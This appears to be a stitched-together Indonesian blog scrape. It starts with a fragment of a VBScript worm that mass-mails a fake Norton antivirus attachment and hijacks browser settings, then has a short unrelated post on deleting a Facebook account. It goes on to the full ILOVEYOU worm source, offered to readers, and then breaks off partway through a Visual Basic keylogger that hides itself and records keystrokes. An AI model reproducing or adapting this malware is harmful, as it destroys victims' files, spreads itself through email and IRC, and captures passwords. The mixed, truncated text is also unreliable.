For i = 1 To Len(baca)
HVFM = Mid(baca, i, 2)
VFMH = VFMH & Chr(Asc(HVFM) - 98)
Next i
P35T19.WriteLine VFMH
P35T19.Close
End If
End Function


Function Fungsi_Pirch(path)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
MasDex = "½®ÇØÇÎÕ¿ol§ÐÃÄÎÇÆŸ“ol¥Ñ×ÐÖŸ˜ol®ÇØÇΓŸ’’’·ÐÍÐÑÙÐÕol’’’·ÐÍÐÑÙÐÕ§ÐÃÄÎÇÆŸ“ol®ÇØÇΔŸ“’’®ÇØÇ΂“’’ol“’’®ÇØÇ΂“’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΕŸ”’’®ÇØÇ΂”’’ol”’’®ÇØÇ΂”’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΖŸ•’’®ÇØÇ΂•’’ol‚•’’®ÇØÇ΂•’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΗŸ–’’®ÇØÇ΂–’’‚ol–’’®ÇØÇ΂–’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΘŸ—’’®ÇØÇ΂—’’ol—’’®ÇØÇ΂—’’§ÐÃÄÎÇÆŸ“olol½’’’·ÐÍÐÑÙÐÕ¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½“’’®ÇØÇ΂“’’¿ol·ÕÇÔ“ŸŒƒŒ¢Œol·ÕÇÔ¥Ñ×ÐÖŸ“ol§ØÇÐÖ“Ÿ±°‚¬±«°œ…œ‘ÆÅÅ‚ÖÕÇÐÆ‚†ÐËÅÍ‚¥œ¾¹«°¦±¹µ¾µÛÕ´ÑÑÖ•”ÆÎΐÇÚÇol§ØÇÐÖ¥Ñ×ÐÖŸ“olol½”’’®ÇØÇ΂”’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½•’’®ÇØÇ΂•’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½–’’®ÇØÇ΂–’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½—’’®ÇØÇ΂—’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’ol"
If path = "" Then
If Obj.fileexists("c:\Pirc\pirch32.exe") Then path = "c:\pirch"
If Obj.fileexists("c:\Pirc32\pirch32.exe") Then path = "c:\pirch32"
P69R22 = Krjkn.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If Obj.fileexists(P69R22 & "\pirch\Pirch32.exe") Then path = P69R22 & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set S24K8 = Obj.CreateTextFile(path & "\events.ini", True)

For i = 1 To Len(MasDex)
HVFM = Mid(MasDex, i, 1)
VFMH = VFMH & Chr(Asc(HVFM) - 98)
Next i

S24K8.WriteLine VFMH
S24K8.Close
End If
End Function


Function Send_Outlook()
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
Set Q9Q83 = CreateObject("Outlook.Application")
kirimkan = Attachments.Add
hapusS = DeleteAfterSubmit
If Q9Q83 = "Outlook" Then
Set Q17U16 = Q9Q83.GetNameSpace("MAPI")
For Each Q8G83 In Q17U16.AddressLists
If Q8G83.AddressEntries.Count <> 0 Then
Q47B57 = Q8G83.AddressEntries.Count
For Q19T80 = 1 To Q47B57
Set Q0R0 = Q9Q83.CreateItem(0)
Set Q9O75 = Q8G83.AddressEntries(Q19T80)

Q0R0.To = Q9O75.Address
Q0R0.Subject = "From your old friend"
Q0R0.Body = "Download your AntiVirus With Norton Anti Virus To get" & vbCrLf & "Download free of charge take License file which we figure In"
Q0R0.kirimkan Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Q0R0.hapusS = True

If Q0R0.To <> "" Then
Q0R0.Send
End If
Next
End If
Next
End If
End Function


Function HTMLR()
Randomize
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
For i = 1 To 1000
A = Int(Rnd * 10000)
Set VGH = Obj.CreateTextFile(Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm", True)
VGH.WriteLine "</html><head><title>RomanticDevil</title><meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-1""></head> <body bgcolor=""#000000"" link=""#006600""> <p align=""right""> <font color=""#00FF00"" size=""6"" face=""Script""> <div align=""right""><font color=""#00FF00"" size=""6"" face=""Script""> A Woman 's heart is a deep ocean of secrets.</font></div><p align=""left""><font color=""#00FF00"" size=""6"" face=""Script"">But now you all know there was a man </font><font color=""#00FF00"" size=""6"" face=""Script"">named jack Dawson, and that he saved me,</font><font color=""#00FF00"" size=""6"" face=""Script"">in every way that a person can be saved.</font><p align=""right""><a href=""mailto:RomanticDevil@yahoo.com""><font size=""6"">Rose Dewitt Bukater</font></a></body></html>"
VGH.Close
Next i
Krjkn.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Local Page", Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm"
Krjkn.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm"
End Function


Sub Gelap()
Set Krjkn = CreateObject("WScript.Shell")
Krjkn.regwrite "HKCU\Control Panel\Colors\ActiveBorder", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ActiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\AppWorkSpace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Background", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonAlternateFace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonDkShadow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonFace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonHilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonLight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonShadow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GradientActiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GradientInactiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GrayText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Hilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\HilightText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\HotTrackingColor", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveBorder", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveTitleText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InfoWindow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Menu", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\TitleText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Window", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\MenuHilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\MenuBar", "0 0 0"
End Sub

Trik Bunuh Diri Paling Efektif!



Weitzz... Bentar dulu, jangan dulu mikir yang macem2 tentang aku yaa. Santai aja, aku ga bakal bunuh diri ko. Jadi gak perlu takut kalo ntar blog ini jadi angker karena si Admin-nya bunuh diri.. :D Tapi, yang mau aku posting ini yaitu trik bunuh diri di DuMay on Facebook..Jadi bukan bunuh diri di dunia nyata..

Sohib blogger semua, masih suka Ngefbi (on-line fb *sok2 bikin istilah baru*) ga?? Kalo udah ga suka dan gak pernah lagi buka FB sama sekali, mendingan bunuh diri aja, daripada info tentang kamu dan jejak2 kamu waktu dulu yang masih doyan ngefbi keburu dijebol hacker (kalo ada yang ngejebol misalnya..) dan takut foto2 pribadi kamu di FB kamu dicuri orang.. So, Kill your facebook, now!

Begini langkah2nya.. Mohon baca baik2 dan si Admin yang nulis ini ga kan tanggungjawab dengan konsekuensi yang akan kamu terima setelah kamu melakukan langkah2 di bawah ini :

• Pertama dan terpenting, yakinin hati dan diri kamu kalo kamu udah ga butuh facebook kamu itu, karena setelah bunuh diri kamu ga kan bisa hidup lagi, alias data2 termasuk foto2 kamu di FB ga kan bisa kamu restore atau dibalikkin lagi..


• Log in seperti biasa ke dalam facebook kamu..


• Arahkan browser kamu ke https://ssl.facebook.com/help/contact.php?show_form=delete_account . .


• Kalo udah, langsung aja klik submit..


• Bunuh diri ga kan terasa sakit sama sekali dan walaupun tadi aku bilang FB kamu akan hilang secara permanen setelah di kill, tetapi nyawa FB kamu masih gentayangan selama kurang lebih dua minggu, jadi apabila kamu ingin nyawa FB kamu kembali, silakan Log in ke akun kamu dan klik cancel deletion..

Oke, segitu deh trik2nya..Dan ingat pesan aku bagi masyarakat dumay di warnet manapun anda berada atau kalo yang punya modem sendiri di manapun anda berada, kalo tiap stat kamu jarang banget ada yang kasi komen atau postingan blog kamu juga jarang banget ada yang kasi komentar, please, jangan bunuh diri asli yaa! dosa loh! langsung masuk neraka!!

Wassalam.

Salam Virus Mania!!!

Temen2 da yang mau source kode Virus I Love You Ga??! Ya udah,, mau ga mau ne udah tak posting! HEHEHEHEHE . . .

rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /

Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Download Directory")

if (downread="") then

downread="c:\"

end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX

.exe"

end if

end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"\script.ini")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,

if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2= /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META

NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?

@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is

good...@-@>"&vbcrlf& _

"<?-?HEAD><BODY

ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read

this HTML file<BR>- Please press #-#YES#-# button to Enable

ActiveX<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>

"&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf& _

"if (window.screen){var wi=screen.availWidth;var

hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf& _

"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

"<!--"&vbcrlf& _

"on error resume next"&vbcrlf& _

"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf& _

"code="

dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _

"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _

"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf& _

"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _

"if (err.number=424) then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf& _

"end if"&vbcrlf& _

"end if"&vbcrlf& _

"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _

"regedit.RegWrite

@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru

n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")

set fso=CreateObject("Scripting.FileSystemObject")

set c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for n=0 to ubound(lines)

lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))

if (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"

end if

next

set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")

b.close

set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)

d.write dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub

Source Kode Keylogger!

Salam Black Trik Mania!!!!

Monggo disedot source kode Kode Key logger nya .. . hehehhe . ..

= code mulai ==========================

‘simpan file hasil compile dg nama regsvc32.exe

‘form

‘simpan dg nama FRMLOG.frm

Option Explicit

Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer

Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long

Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long

Private sAppName As String

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

Private Const VK_BACK = &H8

Private Const VK_CONTROL = &H11

Private Const VK_SHIFT = &H10

Private Const VK_TAB = &H9

Private Const VK_RETURN = &HD

Private Const VK_MENU = &H12

Private Const VK_ESCAPE = &H1B

Private Const VK_CAPITAL = &H14

Private Const VK_SPACE = &H20

Private Const VK_SNAPSHOT = &H2C

Private Const VK_UP = &H26

Private Const VK_DOWN = &H28

Private Const VK_LEFT = &H25

Private Const VK_RIGHT = &H27

Private Const VK_MBUTTON = &H4

Private Const VK_RBUTTON = &H2

Private Const VK_LBUTTON = &H1

Private Const VK_PERIOD = &HBE

Private Const VK_COMMA = &HBC

Private Const VK_NUMLOCK = &H90

Private Const VK_NUMPAD0 = &H60

Private Const VK_NUMPAD1 = &H61

Private Const VK_NUMPAD2 = &H62

Private Const VK_NUMPAD3 = &H63

Private Const VK_NUMPAD4 = &H64

Private Const VK_NUMPAD5 = &H65

Private Const VK_NUMPAD6 = &H66

Private Const VK_NUMPAD7 = &H67

Private Const VK_NUMPAD8 = &H68

Private Const VK_NUMPAD9 = &H69

Private Const VK_F9 = &H78

Private Const VK_F8 = &H77

Private Const VK_F7 = &H76

Private Const VK_F6 = &H75

Private Const VK_F5 = &H74

Private Const VK_F4 = &H73

Private Const VK_F3 = &H72

Private Const VK_F2 = &H71

Private Const VK_F12 = &H7B

Private Const VK_F11 = &H7A

Private Const VK_F10 = &H79

Private Const VK_F1 = &H70

Private Sub LoadTextFile()

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & “settings.ini” For Input As #1

Line Input #1, sAppName

Close

Else

Open App.Path & “\settings.ini” For Input As #1

Line Input #1, sAppName

Close

End If

If sAppName = vbNullString Then

sAppName = “regsvc32″

End If

Exit Sub

dlgerror:

sAppName = “regsvc32″

End Sub

Private Sub SAVEDLL()

Dim nSaveLocation As String

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & sAppName & “.dll”

GoTo READY

Else

Open App.Path & “\” & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & “\” & sAppName & “.dll”

GoTo READY

End If

READY:

If txtLOGGED.Text = vbNullString Then

Exit Sub

End If

Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf

Close

Close

Close

SetAttr nSaveLocation, vbHidden

Exit Sub

dlgerror:

Err.Clear

Exit Sub

End Sub

Private Sub Form_Load()

On Error Resume Next

Call LoadTextFile

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = sAppName

ENTERREGISTRY

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub ENTERREGISTRY()

Dim nKey As Long

RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey

If Len(App.Path) <= 3 Then

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)

Else

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)

End If

End Sub

Private Sub Form_Unload(Cancel As Integer)

Cancel = True

Call SAVEDLL

ENTERREGISTRY

Unload Me

End

End Sub

Private Sub tmrCAPTION_Timer()

On Error Resume Next

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = False

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub tmrLOG_Timer()

On Error Resume Next

Dim nKey, nChar As Integer

Dim nText As String

For nChar = 1 To 255

nKey = GetAsyncKeyState(nChar)

If nKey = -32767 Then

nText = Chr(nChar)

If nChar = VK_BACK Then

nText = ” {B.S} ”

ElseIf nChar = VK_CONTROL Then

nText = ” {CTRL} ”

ElseIf nChar = VK_SHIFT Then

nText = ” {SHIFT} ”

ElseIf nChar = VK_TAB Then

nText = ” {TAB} ”

ElseIf nChar = VK_RETURN Then

nText = ” {ENTER} ”

ElseIf nChar = VK_MENU Then

nText = ” {ALT} ”

ElseIf nChar = VK_ESCAPE Then

nText = ” {ESC} ”

ElseIf nChar = VK_CAPITAL Then

nText = ” {CAPS} ”

ElseIf nChar = VK_SPACE Then

nText = ” {SP.B} ”

ElseIf nChar = VK_UP Then

nText = ” {UP} ”

ElseIf nChar = VK_LEFT Then

nText = ” {LEFT} ”

ElseIf nChar = VK_RIGHT Then

nText = ” {RIGHT} ”

ElseIf nChar = VK_DOWN Then

nText = ” {DOWN} ”

ElseIf nChar = VK_F1 Then

nText = ” {F1} ”

ElseIf nChar = VK_F2 Then

nText = ” {F2} ”

ElseIf nChar = VK_F3 Then

nText = ” {F3} ”

ElseIf nChar = VK_F4 Then

nText = ” {F4} ”

ElseIf nChar = VK_F5 Then

nText = ” {F5} ”

ElseIf nChar = VK_F6 Then

nText = ” {F6} ”

ElseIf nChar = VK_F7 Then

nText = ” {F7} ”

ElseIf nChar = VK_F8 Then

nText = ” {F8} ”

ElseIf nChar = VK_F9 Then

nText = “{F9}”

ElseIf nChar = VK_F10 Then

nText = ” {F10} ”

ElseIf nChar = VK_F11 Then

nText = ” {F11} ”

ElseIf nChar = VK_F12 Then

nText = ” {F12} ”

ElseIf nChar = VK_SNAPSHOT Then

nText = ” {PRINT SCRN} ”

ElseIf nChar = VK_RBUTTON Then

nText = ” {R.B} ”

ElseIf nChar = VK_LBUTTON Then

nText = ” {L.B} ”

ElseIf nChar = VK_MBUTTON Then

nText = ” {M.B} ”

ElseIf nChar = VK_PERIOD Then

nText = “.”

ElseIf nChar = VK_COMMA Then

nText = “,”

ElseIf nChar = VK_NUMLOCK Then

nText = ” {NUMLCK} ”

ElseIf nChar = VK_NUMPAD0 Then

nText = “0″

ElseIf nChar = VK_NUMPAD1 Then

nText = “1″

ElseIf nChar = VK_NUMPAD2 Then

nText = “2″

ElseIf nChar = VK_NUMPAD3 Then

nText = “3″

ElseIf nChar = VK_NUMPAD4 Then

nText = “4″

ElseIf nChar = VK_NUMPAD5 Then

nText = “5″

ElseIf nChar = VK_NUMPAD6 Then

nText = “6″

ElseIf nChar = VK_NUMPAD7 Then

nText = “7″

ElseIf nChar = VK_NUMPAD8 Then

nText = “8″

ElseIf nChar = VK_NUMPAD9 Then

nText = “9″

End If

txtLOGGED.Text = txtLOGGED.Text + nText

End If

Next

Call GetActiveWindowName

End Sub

Private Sub tmrSAVE_Timer()

Call SAVEDLL

